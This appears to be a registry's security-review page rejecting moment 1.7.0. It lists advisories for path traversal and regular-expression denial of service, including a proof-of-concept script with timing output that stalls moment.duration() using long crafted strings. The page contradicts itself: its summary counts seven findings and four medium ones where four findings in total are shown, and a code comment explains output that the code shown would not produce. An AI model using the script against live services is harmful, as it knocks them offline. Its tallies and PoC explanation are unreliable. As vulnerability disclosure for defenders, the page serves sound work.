
moment @1.7.0

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
Risk Score: 100
License: MIT
Install Scripts: No
Dependencies: 0
Dev Dependencies: 3
Package Size: 96.3 KB
Published

Parse, validate, manipulate, and display dates

Maintainers

timrwood

Keywords

moment, date, time, parse, format, validate, i18n, l10n, ender

Dev Dependencies (3)

Package      Constraint   Registry Status
jshint       latest       auto_approved
nodeunit     latest       auto_approved
uglify-js    latest       auto_approved

Risk Dispositions (1 applicable to this version, 1 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule                       Source   Disposition   Author   Reason
osv:GHSA-8hfj-j24r-96c4    osv      reject        AI       AI (osv): Path traversal advisory affects all moment versions < 2.29.2. The disposition was recorded against 2.22.2; this version (1.7.0) is also in the affected range. Verdict generalizes.

Dispositions that do not match any finding on this version (1):

Rule                       Source   Disposition   Author   Reason
osv:GHSA-wc69-rhjr-hc9g    osv      reject        AI       AI (osv): ReDoS advisory affects moment >= 2.18.0, < 2.29.4. The disposition was recorded against 2.22.2, which is in that range; this version (1.7.0) is below it, so the rule raises no finding here. Verdict generalizes.

SAST Findings (4)

CRITICAL GHSA-8hfj-j24r-96c4: Path Traversal: 'dir/../../filename' in moment.locale osv

[Always reject] CVSS 7.5 (HIGH) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

### Impact
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. `fr`, is directly used to switch the moment locale.

### Patches
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).

### Workarounds
Sanitize the user-provided locale name before passing it to moment.js.

### For more information
If you have any questions or comments about this advisory:
* Open an issue in [moment repo](https://github.com/moment/moment)

HIGH GHSA-446m-mv8f-q348: Regular Expression Denial of Service in moment osv

CVSS 7.5 (HIGH) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Affected versions of `moment` are vulnerable to a low severity regular expression denial of service when parsing dates as strings.

## Recommendation
Update to version 2.19.3 or later.

MEDIUM GHSA-87vv-r9j6-g5qv: Regular Expression Denial of Service in moment osv

CVSS 6.5 (MEDIUM) — CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Versions of `moment` prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into `moment.duration()`.

## Proof of concept
```
var moment = require('moment');

// Build a string of len + 1 copies of chr (the loop is inclusive, which is why
// LENGTH below is two more than COUNT once the leading '-' is added).
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Feed progressively longer strings to moment.duration() and time each parse.
// The elapsed time grows much faster than the input length.
// (The advisory's original PoC shared one global `i` between this loop and
// genstr, which is why the recorded COUNT values step by 10001 rather than 10000.)
for (var i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start);
  console.log(end);
}
```

### Results
```
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```

## Recommendation
Please update to version 2.11.2 or later.

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.

Review Summary

Risk score: 100 (capped from 108). Findings: 1 critical (+40), 1 high (+25), 4 medium (+40), 1 low (+3).

Published to npm: